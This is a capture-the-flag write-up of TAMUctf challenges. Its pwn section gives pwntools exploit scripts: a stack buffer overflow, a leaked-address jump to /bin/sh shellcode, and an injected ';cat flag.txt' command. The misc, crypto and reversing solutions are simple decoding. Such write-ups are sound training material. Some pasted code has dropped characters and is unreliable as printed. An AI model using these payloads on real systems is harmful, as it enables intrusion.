반응형

write up by M4ndU (Team WH0a, high school)


Poor English. Sorry.

Pwn


Pwn1

355

nc pwn.tamuctf.com 4321

Difficulty: easy

32bit elf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [sp+1h] [bp-3Bh]@1
  int v5; // [sp+2Ch] [bp-10h]@1
  int v6; // [sp+30h] [bp-Ch]@1
  int *v7; // [sp+38h] [bp-4h]@1
 
  v7 = &argc;
  setvbuf(stdout, (char *)200);
  v6 = 2;
  v5 = 0;
  puts("Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.");
  puts("What... is your name?");
  fgets(&s, 43, stdin);
  if ( strcmp(&s, "Sir Lancelot of Camelot\n") )
  {
    puts("I don't know that! Auuuuuuuugh!");
    exit(0);
  }
  puts("What... is your quest?");
  fgets(&s, 43, stdin);
  if ( strcmp(&s, "To seek the Holy Grail.\n") )
  {
    puts("I don't know that! Auuuuuuuugh!");
    exit(0);
  }
  puts("What... is my secret?");
  gets(&s);
  if ( v5 == 0xDEA110C8 )
    print_flag();
  else
    puts("I don't know that! Auuuuuuuugh!");
  return 0;
}
cs


If value of v5 is equal to 0xDEA110C8, we can get a flag.

Using bof vuln at Line 28 to override v5.

s is at ebp - 0x3B.
v5 is at ebp - 0x10.

offset 43bytes

payload = dummy[43] + v5[4]

exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *
 
= remote("pwn.tamuctf.com"4321)
 
v5 = 0xDEA110C8
 
payload = "A"*43
payload += p32(v5)
 
p.recvline()
p.recvline()
p.sendline("Sir Lancelot of Camelot")
p.recvline()
p.sendline("To seek the Holy Grail.")
p.recvline()
 
p.sendline(payload)
 
p.interactive()
cs


flag : gigem{34sy_CC428ECD75A0D392}



Pwn3

454

nc pwn.tamuctf.com 4323

Difficulty: easy


32bit elf

1
2
3
4
5
6
7
[*] '/home/mandu/pwn3'
    Arch:     i386-32-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      PIE enabled
    RWX:      Has RWX segments
cs

no NX, but PIE enabled.

1
2
3
4
5
6
7
char *echo()
{
  char s; // [sp+Eh] [bp-12Ah]@1
 
  printf("Take this, you might need it on your journey %p!\n"&s);
  return gets(&s);
}
cs

stack leak and bof vuln.

payload = dummy[0x12A+4] + &shellcode[4] + NOP[40] + shellcode[25]

dummy 자리에 nop+shellcode를 넣어봤었는데 잘 안되서 그냥 리턴주소 이후로 빼놨더니 되었습니다.

exploit.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *
 
= remote("pwn.tamuctf.com"4323)
 
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
 
p.recvuntil('ney ')
buffer = int(p.recvuntil('!')[:-1], 16) #leak
 
payload = "A"*(0x12a+4) #dummy
payload += p32(buffer+0x12a+20)  #ret
payload += "\x90"* 40 #NOP
payload += shellcode
 
p.sendline(payload)
 
p.interactive()
cs


flag: gigem{r3m073_fl46_3x3cu710n}



Pwn4

356

nc pwn.tamuctf.com 4324

Difficulty: medium


32bit elf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
int laas()
{
  int result; // eax@2
  char s; // [sp+7h] [bp-21h]@1
 
  puts("ls as a service (laas)(Copyright pending)");
  puts("Enter the arguments you would like to pass to ls:");
  gets(&s);
  if ( strchr(&s, '/') )
    result = puts("No slashes allowed");
  else
    result = run_cmd((int)&s);
  return result;
}
cs

1
2
3
4
5
6
7
8
int __cdecl run_cmd(int a1)
{
  char s; // [sp+2h] [bp-26h]@1
 
  snprintf(&s, 0x1Bu, "ls %s", a1);
  printf("Result of %s:\n"&s);
  return system(&s);
}
cs


no filtering ";".
So, You can use more than one command with ";".

ls as a service (laas)(Copyright pending)
Enter the arguments you would like to pass to ls:
.
Result of ls .:
flag.txt
pwn4
ls as a service (laas)(Copyright pending)
Enter the arguments you would like to pass to ls:
.;cat flag.txt
Result of ls .;cat flag.txt:
flag.txt
pwn4
gigem{5y573m_0v3rfl0w}


flag : gigem{5y573m_0v3rfl0w}

EZ



MISC


Howdy!


mic check


flag : gigem{H0wdy!}




Who am I?

100

What is the A record for tamuctf.com?
(Not in standard gigem{flag} format)

Difficulty: easy


I used 'ping' command to find out A record for tmuctf.com


[MS cmd]

>ping tamuctf.com

 Ping tamuctf.com [52.33.57.247] 32바이트 데이터 사용: 


flag : 52.33.57.247




Who do I trust?

100

Who issued the certificate to tamuctf.com?
(Not in standard gigem{flag} format)

Difficulty: easy


ssl checker

https://www.sslshopper.com/ssl-checker.html#hostname=tamuctf.com


I could get ssl issuer


flag : Let's Encrypt Authority X3




Where am I?

100

What is the name of the city where the server for tamuctf.com is located?

(Not in standard gigem{flag} format)

Difficulty: easy


https://iplocation.com/


52.33.57.247


flag : Boardman



I heard you like files.

428

Bender B. Rodriguez was caught with a flash drive with only a single file on it. We think it may contain valuable information. His area of research is PDF files, so it's strange that this file is a PNG.

Difficulty: easy-medium



There is end signature of PNG at 0x340232


base64 encoded string, and PDF file.



I tried decoding base64 string,



Nice try, but there is no flag here.

You should check this music video out though, it's pretty cool.

https://www.youtube.com/watch?v=TuJqUvBj4rE


but it was not a flag..



Then, I exported part of pdf data.


I opened it.


ok... rename .pdf to .zip



i found another png file.


Open it with hex viewer.



pdf file again





found base64 string


flag : flag{P0lYt@r_D0_y0u_G3t_It_N0w?}





MicroServices



0_intrusion

100


Welcome to MicroServices inc, where do all things micro and service oriented!
Recently we got an alert saying there was suspicious traffic on one of our web servers. Can you help us out?

  1. What is the IP Address of the attacker?



open with wireshark.


packets 을 length order로 보면 10.91.9.93 sent many tcp packets to server.


so attacker's ip is 10.91.9.93


flag : 10.91.9.93




Crypto


-.-

244

To 1337-H4X0R:

Our coworker Bob loves a good classical cipher. Unfortunately, he also loves to send everything encrypted with these ciphers. Can you go ahead and decrypt this for me?

Difficulty: easy


dah-dah-dah-dah-dah dah-di-di-dah di-di-di-di-dit dah-dah-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-dah-dah-dah di-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dit dah-dah-dah-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-di-di-dah dah-dah-di-di-dit di-di-di-di-dit di-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-di-dit dah-di-di-di-dit di-di-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-dah-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dit dah-di-di-di-dit dah-di-dit di-di-di-di-dah dah-di-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dit di-di-di-di-dit di-di-dah-dah-dah di-dah dah-dah-di-di-dit di-di-di-dah-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit di-di-di-di-dah dah-dah-dah-di-dit dah-di-di-di-dit dah-di-di-dit dah-di-di-di-dit di-dah di-di-di-di-dah dah-dah-dah-dah-dit dah-dah-di-di-dit di-di-di-di-dah di-di-dah-dah-dah di-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-dah-dah-dah dah-di-di-di-dit di-di-di-di-dah di-dah dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dit di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-di-di-di-dit di-dah dah-di-di-di-dit dah-di-dit di-di-dah-dah-dah di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-dit di-di-di-di-dah di-di-di-di-dah dah-di-di-di-dit dah-di-di-dit dah-di-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dit dit di-di-di-di-dah dit di-di-di-dah-dah dah-dah-dah-dah-dit dah-di-di-di-dit dah-di-di-di-dit dah-di-di-di-dit dah-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-di-dit di-di-di-di-dah di-di-di-di-dit di-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit di-di-dah-dit di-di-di-di-dit di-di-di-di-dah di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dit di-dah di-di-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dah-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dit di-dah di-di-di-di-dah dah-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah di-dah di-di-dah-dah-dah di-dah-dah-dah-dah di-di-di-di-dah dah-di-di-di-dit dah-di-di-di-dit dah-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-di-di-di-dit dah-di-dah-dit di-di-dah-dah-dah di-di-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah dah-di-di-di-dit di-dah dah-dah-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dah dah-di-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-di-dah dah-dah-dah-dah-dit di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-di-dit dah-di-di-di-dit di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit dah-dah-di-di-dit di-dah di-di-di-di-dah dah-dah-di-di-dit di-di-dah-dah-dah dah-dah-dah-dah-dah dah-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-di-di-dit dah-di-di-di-dit dah-di-dit dah-dah-di-di-dit dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-dah-dah di-dah-dah-dah-dah dah-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-dit di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit di-di-di-dah-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-dah-dah di-dah-dah-dah-dah di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dah dah-di-di-dit di-di-dah-dah-dah dah-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dit di-di-di-dah-dah dah-dah-dah-dah-dah dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-dah-dah-di-dit di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-dah-dah di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dah dah-dah-dah-dah-dit di-di-di-dah-dah di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-dit di-di-dah-dah-dah dah-dah-dah-dah-dah dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit di-dah di-di-di-di-dah dah-di-di-dit di-di-di-di-dit di-dah dah-dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-di-dit dah-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dah di-di-di-di-dah di-di-di-di-dit di-di-di-dah-dah dah-di-di-di-dit dah-dah-dah-di-dit di-di-di-di-dah dah-di-dah-dit dah-di-di-di-dit dah-di-dit di-di-di-dah-dah dah-dah-dah-di-dit di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit dah-di-di-di-dit dit di-di-di-di-dit di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah dah-dah-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-dah di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dah dit dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah di-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-di-dit dah-dah-dah-di-dit di-di-dah-dah-dah dah-di-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dit di-di-dah-dah-dah di-dah-dah-dah-dah di-di-di-dah-dah di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dit di-di-di-di-dah dah-dah-di-di-dit di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dit di-di-dah-dah-dah dah-dah-di-di-dit di-dah di-di-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah di-dah-dah-dah-dah dah-di-di-di-dit di-dah di-di-dah-dah-dah di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-di-dit di-di-di-di-dah di-di-dah-dah-dah dah-di-di-di-dit di-dah dah-di-di-di-dit di-di-di-di-dah di-di-di-di-dah dit di-di-di-di-dah dah-dah-dah-dah-dit dah-dah-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-dah-dah di-di-di-di-dit dah-dah-di-di-dit dah-dah-di-di-dit di-di-dah-dah-dah di-di-di-dah-dah di-di-dah-dah-dah di-di-di-di-dah di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dit di-di-di-di-dit di-dah di-di-di-di-dah di-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dit di-dah di-di-di-dah-dah di-di-dah-dah-dah dah-dah-di-di-dit di-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-dah-dah-dah dah-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-di-dit di-di-di-di-dah dah-di-dah-dit di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-dah-dit di-di-di-dah-dah dah-dah-di-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-dah-dah di-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah dah-dah-dah-dah-dit


4 or 5 개로 이루어져 있는 것으로 보아, they are must be morse code. The title of this task is also - . -


replace

dah ------> _

di , dit ---> .

- to ------>


and decode it!


0X57702A6C58744751386538716E6D4D59552A737646486B6A49742A5251264A705A766A6D2125254B446B6670235E4E39666B346455346C423372546F5430505A516D4351454B5942345A4D762A21466B386C25626A716C504D6649476D612525467A4720676967656D7B433169634B5F636C31434B2D7930755F683476335F6D3449317D20757634767A4B5A7434796F6D694453684C6D385145466E5574774A404E754F59665826387540476E213125547176305663527A56216A217675757038426A644E49714535772324255634555A4F595A327A37543235743726784C40574F373431305149


oh it's hex value.


hex to string https://codebeautify.org/hex-string-converter


Wp*lXtGQ8e8qnmMYU*svFHkjIt*RQ&JpZvjm!%%KDkfp#^N9fk4dU4lB3rToT0PZQmCQEKYB4ZMv*!Fk8l%bjqlPMfIGma%%FzG gigem{C1icK_cl1CK-y0u_h4v3_m4I1} uv4vzKZt4yomiDShLm8QEFnUtwJ@NuOYfX&8u@Gn!1%Tqv0VcRzV!j!vuup8BjdNIqE5w#$%V4UZOYZ2z7T25t7&xL@WO7410QI



flag : gigem{C1icK_cl1CK-y0u_h4v3_m4I1}




Reversing


Cheesy

100

easy

Where will you find the flag?


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v3; // rdx@1
  __int64 v4; // rdx@1
  __int64 v5; // rdx@1
  __int64 v6; // rdx@1
  __int64 v7; // rdx@1
  __int64 v8; // rdx@1
  int result; // eax@1
  __int64 v10; // rcx@1
  char v11; // [sp+Fh] [bp-41h]@1
  char v12; // [sp+10h] [bp-40h]@1
  __int64 v13; // [sp+38h] [bp-18h]@1
 
  v13 = *MK_FP(__FS__, 40LL);
  std::operator<<<std::char_traits<char>>(&std::cout"QUFBQUFBQUFBQUFBQUFBQQ==\n", envp);
  std::operator<<<std::char_traits<char>>(&std::cout"Hello! I bet you are looking for the flag..\n", v3);
  std::operator<<<std::char_traits<char>>(
    &std::cout,
    "I really like basic encoding.. can you tell what kind I used??\n",
    v4);
  std::operator<<<std::char_traits<char>>(&std::cout"RkxBR2ZsYWdGTEFHZmxhZ0ZMQUdmbGFn\n", v5);
  std::operator<<<std::char_traits<char>>(&std::cout"Q2FuIHlvdSByZWNvZ25pemUgYmFzZTY0Pz8=\n", v6);
  std::operator<<<std::char_traits<char>>(&std::cout"RkxBR2ZsYWdGTEFHZmxhZ0ZMQUdmbGFn\n", v7);
  std::allocator<char>::allocator(&v11);
  std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string(
    &v12,
    "Z2lnZW17M2E1eV9SM3YzcjUxTjYhfQ==\n",
    &v11);
  std::allocator<char>::~allocator(&v11);
  std::operator<<<std::char_traits<char>>(&std::cout"WW91IGp1c3QgbWlzc2VkIHRoZSBmbGFn\n", v8);
  std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::~basic_string(&v12);
  result = 0;
  v10 = *MK_FP(__FS__, 40LL) ^ v13;
  return result;
}
cs



Decode a string which is at 28.


flag : gigem{3a5y_R3v3r51N6!}




Snakes over cheese

191

easy

What kind of file is this?


decomplie .pyc file https://python-decompiler.com/


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from datetime import datetime
Fqaa = [1021089710312310010199111109112105108101125]
XidT = [83117112101114831019911410111675101121]
 
def main():
    print 'Clock.exe'
    input = raw_input('>: ').strip()
    kUIl = ''
    for i in XidT:
        kUIl += chr(i)
 
    if input == kUIl:
        alYe = ''
        for i in Fqaa:
            alYe += chr(i)
 
        print alYe
    else:
        print datetime.now()
 
 
if __name__ == '__main__':
    main()

cs


Good


I thought alYe is a flag, because this program prints alYe when the value of input is equal to kUIl.


Convert Fqaa to ascii


flag : flag{decompile}

반응형

+ Recent posts